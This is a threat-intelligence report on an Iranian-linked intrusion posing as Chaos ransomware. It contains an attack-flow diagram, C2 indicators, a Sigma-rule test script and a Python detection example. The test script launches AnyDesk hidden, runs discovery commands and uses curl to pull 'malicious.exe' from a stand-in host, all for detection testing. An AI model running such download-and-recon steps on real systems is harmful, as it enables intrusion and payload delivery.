SOC Prime Bias: Critical

07 May 2026 18:26

Chaos Ransomware and the State-Sponsored Threat Behind It

Summary

In early 2026, what initially appeared to be a routine Chaos ransomware incident was later identified as a false-flag operation tied to the Iranian state-linked group MuddyWater, also known as Seedworm. Rather than focusing on file encryption, the attackers used Microsoft Teams for social engineering, stole credentials and MFA tokens, and deployed a custom downloader together with a remote access trojan. The operation reused infrastructure associated with MuddyWater, including a code-signing certificate, and was geared toward data theft and persistent long-term access.

Investigation

Rapid7 investigators reconstructed the intrusion chain from Teams-based credential theft to the use of legitimate remote administration tools such as AnyDesk and DWAgent, followed by delivery of ms_upd.exe, which retrieved a custom RAT named Game.exe. The team identified command-and-control domains including moonzonet.com and uploadfiler.com, along with multiple associated IP addresses and a signing certificate previously linked to MuddyWater. Malware analysis also uncovered anti-analysis behavior, a mutex used to enforce single execution, and persistence mechanisms involving a service and hidden files.

Mitigation

Organizations should enforce stronger MFA protections, restrict remote desktop access and Teams screen-sharing to trusted accounts, and monitor for legitimate remote access tools being used in unusual contexts. Application allow-listing should be applied to code-signed binaries, and execution of unsigned files from user-accessible directories should be blocked. Security teams should also audit certificate usage regularly and block the known malicious domains and IP addresses tied to the campaign.

Response

If this activity is detected, isolate the affected systems immediately, revoke compromised credentials and MFA tokens, and begin full forensic collection. The identified command-and-control infrastructure should be blocked, AnyDesk and DWAgent services should be removed, and the custom RAT should be eradicated from the environment. Threat hunting should also be conducted for the mutex ATTRIBUTES_ObjectKernel and any remaining files stored under ProgramData.

Attack Flow

    graph TB
        %% Class definitions
        classDef action fill:#99ccff
        classDef tool fill:#cccccc
        classDef file fill:#aaffaa
        classDef process fill:#ffcc99
        classDef malware fill:#ff9999

        %% Nodes – Actions
        action_initial_access["<b>Action</b> – <b>T1566 Phishing</b><br/>Adversary sent malicious Microsoft Teams chat messages that lured users to a fake Quick Assist screen-sharing session."]
        class action_initial_access action
        action_user_exec_link["<b>Action</b> – <b>T1204.001 User Execution: Malicious Link</b><br/>Victims clicked a malicious link delivered via Teams which initiated download of <i>ms_upd.exe</i>."]
        class action_user_exec_link action
        action_user_exec_copypaste["<b>Action</b> – <b>T1204.004 User Execution: Malicious Copy and Paste</b><br/>Attackers instructed users to copy-paste credentials into locally created text files."]
        class action_user_exec_copypaste action
        action_cred_access["<b>Action</b> – <b>T1552.008 Unsecured Credentials</b> & <b>T1078 Valid Accounts</b><br/>Harvested credentials from chat messages and used them to log into internal systems."]
        class action_cred_access action
        action_auth_mod["<b>Action</b> – <b>T1556.001 Domain Controller Authentication</b><br/>Compromised credentials were used to authenticate to the domain controller gaining privileged access."]
        class action_auth_mod action
        action_discovery["<b>Action</b> – <b>T1082 System Information Discovery</b> & <b>T1016 System Network Configuration Discovery</b><br/>Malware collected hostname, username, domain, IP address via ipconfig, whoami, etc."]
        class action_discovery action
        action_ingress_transfer["<b>Action</b> – <b>T1105 Ingress Tool Transfer</b><br/><i>ms_upd.exe</i> downloaded additional payloads (WebView2Loader.dll, Game.exe, visualwincomp.txt) using curl."]
        class action_ingress_transfer action
        action_execution["<b>Action</b> – <b>T1059 Command and Scripting Interpreter</b><br/>Attacker executed cmd.exe, PowerShell and pythonw.exe to run the downloaded binaries."]
        class action_execution action
        action_process_injection["<b>Action</b> – <b>T1055.011 Extra Window Memory Injection</b> & <b>T1055.002 Portable Executable Injection</b><br/>pythonw.exe injected code into suspended processes to launch the RAT stealthily."]
        class action_process_injection action
        action_defense_evasion["<b>Action</b> – <b>T1027 Obfuscated Files or Information</b> & <b>T1497 Virtualization/Sandbox Evasion</b><br/>Payloads XOR-encoded, AES-256-GCM encrypted; checks for analysis DLLs, VM identifiers and timing to avoid sandbox detection."]
        class action_defense_evasion action
        action_persistence["<b>Action</b> – <b>T1219 Remote Access Tools</b><br/>Deployment of DWAgent service and AnyDesk for long-term remote control."]
        class action_persistence action
        action_lateral_movement["<b>Action</b> – <b>T1563 Remote Service Session Hijacking (RDP)</b> & <b>T1668 Exclusive Control</b><br/>Used legitimate RDP sessions to move laterally and execute commands on additional hosts."]
        class action_lateral_movement action
        action_collection_exfil["<b>Action</b> – <b>T1560 Archive Collected Data</b> & <b>T1041 Exfiltration Over C2 Channel</b><br/>Data archived in XOR-encrypted archive and uploaded to uploadfiler.com."]
        class action_collection_exfil action
        action_c2["<b>Action</b> – <b>T1090 Proxy</b> & <b>T1573 Encrypted Channel</b><br/>Communication with C2 infrastructure (moonzonet.com, uploadfiler.com) over HTTPS with encrypted payloads."]
        class action_c2 action

        %% Nodes – Tools / Files / Processes / Malware
        file_ms_upd["<b>File</b> – <b>Name</b>: ms_upd.exe<br/><b>Description</b>: Initial dropper that retrieves further payloads."]
        class file_ms_upd file
        file_webview["<b>File</b> – <b>Name</b>: WebView2Loader.dll<br/><b>Description</b>: Supporting DLL for rendering web content."]
        class file_webview file
        file_game["<b>File</b> – <b>Name</b>: Game.exe<br/><b>Description</b>: Secondary payload executed after download."]
        class file_game file
        file_visual["<b>File</b> – <b>Name</b>: visualwincomp.txt<br/><b>Description</b>: Text file used for configuration data."]
        class file_visual file
        process_cmd["<b>Process</b> – <b>Name</b>: cmd.exe<br/><b>Purpose</b>: Executes command-line instructions."]
        class process_cmd process
        process_ps["<b>Process</b> – <b>Name</b>: PowerShell<br/><b>Purpose</b>: Runs PowerShell scripts for payload execution."]
        class process_ps process
        process_python["<b>Process</b> – <b>Name</b>: pythonw.exe<br/><b>Purpose</b>: Executes Python based components and performs process injection."]
        class process_python process
        malware_dwaga["<b>Malware</b> – <b>Name</b>: DWAgent Service<br/><b>Purpose</b>: Provides persistent remote access."]
        class malware_dwaga malware
        tool_anydesk["<b>Tool</b> – <b>Name</b>: AnyDesk<br/><b>Description</b>: Legitimate remote desktop utility used for persistence and lateral movement."]
        class tool_anydesk tool

        %% Connections – Flow
        action_initial_access -->|leads_to| action_user_exec_link
        action_user_exec_link -->|downloads| file_ms_upd
        action_user_exec_link -->|leads_to| action_user_exec_copypaste
        action_user_exec_copypaste -->|provides| action_cred_access
        action_cred_access -->|enables| action_auth_mod
        action_auth_mod -->|enables| action_discovery
        action_discovery -->|triggers| action_ingress_transfer
        action_ingress_transfer -->|downloads| file_webview
        action_ingress_transfer -->|downloads| file_game
        action_ingress_transfer -->|downloads| file_visual
        action_ingress_transfer -->|leads_to| action_execution
        action_execution -->|executes| process_cmd
        action_execution -->|executes| process_ps
        action_execution -->|executes| process_python
        process_python -->|injects| action_process_injection
        action_process_injection -->|facilitates| action_defense_evasion
        action_defense_evasion -->|enables| action_persistence
        action_persistence -->|installs| malware_dwaga
        action_persistence -->|installs| tool_anydesk
        malware_dwaga -->|supports| action_lateral_movement
        tool_anydesk -->|supports| action_lateral_movement
        action_lateral_movement -->|collects| action_collection_exfil
        action_collection_exfil -->|exfiltrates via| action_c2

        %% Styling
        class action_initial_access,action_user_exec_link,action_user_exec_copypaste,action_cred_access,action_auth_mod,action_discovery,action_ingress_transfer,action_execution,action_process_injection,action_defense_evasion,action_persistence,action_lateral_movement,action_collection_exfil,action_c2 action
        class file_ms_upd,file_webview,file_game,file_visual file
        class process_cmd,process_ps,process_python process
        class malware_dwaga malware
        class tool_anydesk tool

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:

    1. Establish a remote foothold using the legitimate remote‑management tool AnyDesk.exe (mirroring the “remote‑tool” selector).
    2. Perform network reconnaissance by executing ipconfig and whoami from the same session – satisfying the “discovery command” selector.
    3. Download a malicious payload using curl invoked through cmd.exe, a classic technique for “Ingress Tool Transfer” (T1105) and “Command‑Line Interface” (T1059).
    4. Execute the payload to complete the kill‑chain (not required for rule validation, but included for realism).
  • Regression Test Script:

    # -------------------------------------------------
    # Simulation Script – triggers the Sigma rule
    # -------------------------------------------------
    # 1. Launch AnyDesk (simulated – assumes AnyDesk.exe is in PATH; the call fails
    #    loudly if it is not, which is the desired behaviour for a regression test)
    Start-Process -FilePath "AnyDesk.exe" -ArgumentList "--no-sandbox" -WindowStyle Hidden
    
    # 2. Run discovery commands via cmd.exe so the process tree shows cmd.exe -> ipconfig/whoami
    $discovery = @(
        "ipconfig /all",
        "whoami",
        "net start"
    )
    foreach ($cmd in $discovery) {
        cmd.exe /c $cmd | Out-Null
    }
    
    # 3. Use cmd.exe + curl to fetch a dummy payload
    #    Note the backslash: "$env:TEMPpayload.exe" would expand the (non-existent)
    #    variable $env:TEMPpayload and produce the path ".exe"
    $payloadUrl = "http://example.com/malicious.exe"
    $outputPath = "$env:TEMP\payload.exe"
    $downloadCmd = "curl $payloadUrl -o $outputPath"
    cmd.exe /c $downloadCmd
    
    # Optional: Execute the payload (commented for safety)
    # Start-Process -FilePath $outputPath -WindowStyle Hidden
    # -------------------------------------------------
  • Cleanup Commands:

    # Terminate AnyDesk if it was started
    Get-Process -Name "AnyDesk" -ErrorAction SilentlyContinue | Stop-Process -Force
    
    # Remove the downloaded payload (same path as $outputPath in the simulation script)
    Remove-Item -Path "$env:TEMP\payload.exe" -Force -ErrorAction SilentlyContinue
    
    # Clear any lingering cmd.exe instances created by the script.
    # cmd.exe /c exits on completion, so normally nothing is left; be aware that this
    # stops every cmd.exe on the host, not only those started by this script.
    Get-Process -Name "cmd" -ErrorAction SilentlyContinue | Stop-Process -Force
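The simulation above is built to fire three selectors (remote tool, discovery command, curl download through cmd.exe). The following is an added example, not part of the SOC Prime report or its rule, showing how those selectors can be correlated per host and user over process-creation telemetry; the events, the `example.invalid` URL and the 30-minute window are constructed for illustration.

```python
import ntpath
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Sysmon-style process-creation records (timestamp, host, user,
# parent image, image, command line). Sample data for this example, not real telemetry.
SAMPLE_EVENTS = [
    ("2026-02-03T09:00:01", "ws01", "CORP\\alice", "explorer.exe", "AnyDesk.exe", "AnyDesk.exe"),
    ("2026-02-03T09:02:10", "ws01", "CORP\\alice", "AnyDesk.exe", "cmd.exe", "cmd.exe /c ipconfig /all"),
    ("2026-02-03T09:02:15", "ws01", "CORP\\alice", "AnyDesk.exe", "cmd.exe", "cmd.exe /c whoami"),
    ("2026-02-03T09:05:40", "ws01", "CORP\\alice", "AnyDesk.exe", "cmd.exe",
     "cmd.exe /c curl http://example.invalid/ms_upd.exe -o C:\\Users\\Public\\ms_upd.exe"),
    # Benign: an admin running ipconfig from a normal desktop session, no remote tool, no download.
    ("2026-02-03T10:30:00", "ws02", "CORP\\bob", "explorer.exe", "cmd.exe", "cmd.exe /c ipconfig /all"),
]

REMOTE_TOOLS = {"anydesk.exe"}             # extend with the DWAgent binaries used in your estate
DISCOVERY_TOKENS = ("ipconfig", "whoami")  # the two discovery commands the narrative uses
CURL_DOWNLOAD = re.compile(r"\bcurl(?:\.exe)?\b.*\s(?:-o|--output)\s", re.IGNORECASE)

def _base(path):
    return ntpath.basename(path).lower()

def is_remote_tool(parent, image):
    """Selector 1: a remote-management tool started, or a child spawned from one."""
    return _base(parent) in REMOTE_TOOLS or _base(image) in REMOTE_TOOLS

def is_discovery(cmdline):
    """Selector 2: host/network discovery command on the command line."""
    return any(tok in cmdline.lower() for tok in DISCOVERY_TOKENS)

def is_curl_download(image, cmdline):
    """Selector 3: cmd.exe invoking curl with an output file (ingress tool transfer)."""
    return _base(image) == "cmd.exe" and CURL_DOWNLOAD.search(cmdline) is not None

def detect(events, window=timedelta(minutes=30)):
    """Alert on a curl download preceded, within `window`, by a remote-tool foothold
    and a discovery command for the same host and user. Returns a list of alerts."""
    seen = defaultdict(lambda: {"remote_tool": [], "discovery": []})
    alerts = []
    for ts, host, user, parent, image, cmdline in sorted(events):
        t = datetime.fromisoformat(ts)
        key = (host.lower(), user.lower())
        if is_remote_tool(parent, image):
            seen[key]["remote_tool"].append(t)
        if is_discovery(cmdline):
            seen[key]["discovery"].append(t)
        # The download is the anchor: both earlier selectors must sit inside the window.
        if is_curl_download(image, cmdline) and all(
                any(t - window <= s <= t for s in hits) for hits in seen[key].values()):
            alerts.append({"host": host, "user": user, "time": ts, "cmdline": cmdline})
    return alerts
```

Running `detect(SAMPLE_EVENTS)` yields one alert for ws01/alice and none for the lone ipconfig on ws02, which is the false-positive case the three-selector design is meant to suppress.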

End of Report